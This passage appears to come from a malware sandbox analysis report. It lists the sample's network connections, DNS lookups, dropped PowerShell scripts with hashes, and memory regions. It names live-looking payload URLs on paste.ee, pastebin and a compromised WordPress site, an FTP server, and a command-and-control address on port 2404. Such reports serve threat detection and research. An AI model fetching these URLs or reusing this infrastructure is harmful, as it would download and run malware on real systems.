        240.221.184.93.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.221.184.93.in-addr.arpa
        IN PTR
        Response
      • 191.252.83.213:21
        ftp.desckvbrat.com.br
        ftp
        powershell.exe
        1.0kB
        1.3kB
        20
        17
      • 191.252.83.213:60202
        ftp.desckvbrat.com.br
        powershell.exe
        190 B
        154 B
        4
        3
      • 104.21.84.67:443
        https://paste.ee/d/WdRMT/0
        tls, http
        powershell.exe
        3.7kB
        116.7kB
        70
        126

        HTTP Request

        GET https://paste.ee/d/A73sV/0

        HTTP Response

        200

        HTTP Request

        GET https://paste.ee/d/g6QGg/0

        HTTP Response

        200

        HTTP Request

        GET https://paste.ee/d/WdRMT/0

        HTTP Response

        200
      • 191.252.83.213:60754
        ftp.desckvbrat.com.br
        powershell.exe
        190 B
        154 B
        4
        3
      • 173.231.247.100:443
        https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt
        tls, http
        powershell.exe
        17.7kB
        686.7kB
        351
        498

        HTTP Request

        GET https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt

        HTTP Response

        200
      • 191.252.83.213:60330
        ftp.desckvbrat.com.br
        powershell.exe
        190 B
        154 B
        4
        3
      • 172.67.19.24:443
        https://pastebin.com/raw/pQQ0n3eA
        tls, http
        powershell.exe
        726 B
        3.8kB
        8
        8

        HTTP Request

        GET https://pastebin.com/raw/pQQ0n3eA

        HTTP Response

        200
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
        260 B
        200 B
        5
        5
      • 212.162.149.163:2404
        RegAsm.exe
      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        ftp.desckvbrat.com.br
        dns
        powershell.exe
        67 B
        97 B
        1
        1

        DNS Request

        ftp.desckvbrat.com.br

        DNS Response

        191.252.83.213

      • 8.8.8.8:53
        64.159.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        64.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        213.83.252.191.in-addr.arpa
        dns
        73 B
        138 B
        1
        1

        DNS Request

        213.83.252.191.in-addr.arpa

      • 8.8.8.8:53
        paste.ee
        dns
        powershell.exe
        54 B
        86 B
        1
        1

        DNS Request

        paste.ee

        DNS Response

        104.21.84.67
        172.67.187.200

      • 8.8.8.8:53
        67.84.21.104.in-addr.arpa
        dns
        71 B
        133 B
        1
        1

        DNS Request

        67.84.21.104.in-addr.arpa

      • 8.8.8.8:53
        www.gratitudeseekers.com
        dns
        powershell.exe
        70 B
        100 B
        1
        1

        DNS Request

        www.gratitudeseekers.com

        DNS Response

        173.231.247.100

      • 8.8.8.8:53
        100.247.231.173.in-addr.arpa
        dns
        74 B
        116 B
        1
        1

        DNS Request

        100.247.231.173.in-addr.arpa

      • 8.8.8.8:53
        pastebin.com
        dns
        powershell.exe
        58 B
        106 B
        1
        1

        DNS Request

        pastebin.com

        DNS Response

        172.67.19.24
        104.20.4.235
        104.20.3.235

      • 8.8.8.8:53
        24.19.67.172.in-addr.arpa
        dns
        71 B
        133 B
        1
        1

        DNS Request

        24.19.67.172.in-addr.arpa

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        53.210.109.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        53.210.109.20.in-addr.arpa

      • 8.8.8.8:53
        206.23.85.13.in-addr.arpa
        dns
        71 B
        145 B
        1
        1

        DNS Request

        206.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        240.221.184.93.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        240.221.184.93.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\1210\logs.dat

        Filesize

        144B

        MD5

        f0a4e8fe1e6f68abb30bd96063bbdd65

        SHA1

        a944151ffbc65f3e50a049a62a039cd3110b55a7

        SHA256

        04043fa96469f00cd35a6bbd2cebb7f94590978e349bf0be991feefa5e137a48

        SHA512

        b631372bac47462b0514d26f86b8e676275333e1d11dc7d6908ca27204f3f06ac32260cce3541bc034e105d0f7b58de28cb63dd3f89308936901ce7574ba0413

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        6c14b13b09ca3250b8c108b05aa1afb0

        SHA1

        18e50e6f1f445add8dbfd7441dba50b4d36f42f0

        SHA256

        a147f4fb3ba4dee9197d7192ce22385e2c5da6987ab044bd2d2d2b7adac71c4a

        SHA512

        feca9dd078055a76d09290c2e6ff9dae608bdff807fe7e742ea4961a4877f2b5eb3d9d171941dfd0f19cebd1cebed7d35b3d6cbbecfe7ddfda5daf2bb4f85f69

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        eb3000415eb99f501f17adc8986d82e9

        SHA1

        debcebcf3d78bcedf49512ba079fcd59e2b9a274

        SHA256

        4a381064a874120659c2c68508f8cc8732518b60c92e4bbd158642bf8e295dd0

        SHA512

        0addbd990fe39e016285ebd18233a302cb3c09229eb064cc141cfe57e291b458ea09629d18c2c24d562bcafe1393069601ee2850f2b3960794260a09a4b5a8bb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        721991167161c45d61b03e4dbad4984b

        SHA1

        fd3fa85d142b5e8d4906d3e5bfe10c5347958457

        SHA256

        0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

        SHA512

        f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1weyrbwz.k5g.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\rnmzv.ps1

        Filesize

        1.7MB

        MD5

        e7c82fa422bc247b3af1f0c6a98a76a6

        SHA1

        48e038fe5710a3c71d70eaf756a15c1a9f0ed576

        SHA256

        5503e9420481271cbc5ba26f1b106cd2bb6e985cce64183ec17a06eb0c6dbc59

        SHA512

        5095bbe62cd54c4875393bd2398ff74b93048d81d94678f0407aa98eda99b63219db42685beb4791b6b735684f98b27f2dd507362352ef09cbe701440484aac1

      • C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1

        Filesize

        392B

        MD5

        5a22df6b3134a8f60a0463b4fa3aaa30

        SHA1

        28caa9181e48a30a08458afc1b5d5b70741d4e9f

        SHA256

        5be7abf20950ffc57ac23cb16430d59e9b0162629cc86a71025f707135485539

        SHA512

        ed356adb870af28ae1e3bc6e7b1af6ef3cd4de697d3a3a1383b957bd27dbb62396bf9ed4165d4e07a68f54ee4ef46030504b8e48c7e31c7d55cc84cec87a3fe1

      • memory/2432-59-0x00007FFDE98C3000-0x00007FFDE98C5000-memory.dmp

        Filesize

        8KB

      • memory/2432-60-0x00007FFDE98C0000-0x00007FFDEA381000-memory.dmp

        Filesize

        10.8MB

      • memory/2432-12-0x00007FFDE98C0000-0x00007FFDEA381000-memory.dmp

        Filesize

        10.8MB

      • memory/2432-11-0x00007FFDE98C0000-0x00007FFDEA381000-memory.dmp

        Filesize

        10.8MB

      • memory/2432-68-0x00007FFDE98C0000-0x00007FFDEA381000-memory.dmp

        Filesize

        10.8MB

      • memory/2432-1-0x0000021FA0490000-0x0000021FA04B2000-memory.dmp

        Filesize

        136KB

      • memory/2432-0-0x00007FFDE98C3000-0x00007FFDE98C5000-memory.dmp

        Filesize

        8KB

      • memory/2880-80-0x000001D1B6BB0000-0x000001D1B6BBA000-memory.dmp

        Filesize

        40KB

      • memory/3308-22-0x00000149A9F40000-0x00000149A9F4A000-memory.dmp

        Filesize

        40KB

      • memory/4040-110-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-125-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-86-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-89-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-90-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-91-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-92-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-94-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-95-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-97-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-98-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-99-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-100-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-102-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-103-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-105-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-106-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-107-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-83-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-109-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-81-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-111-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-113-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-114-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-116-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-117-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-118-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-120-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-121-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-122-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-124-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-85-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-127-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-128-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-129-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-131-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-132-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-133-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-135-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-136-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-138-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-139-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-140-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-142-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-143-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-144-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-146-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-147-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-149-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-150-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-151-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-153-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-154-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-155-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-157-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-158-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-160-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-161-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-162-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-163-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4040-165-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.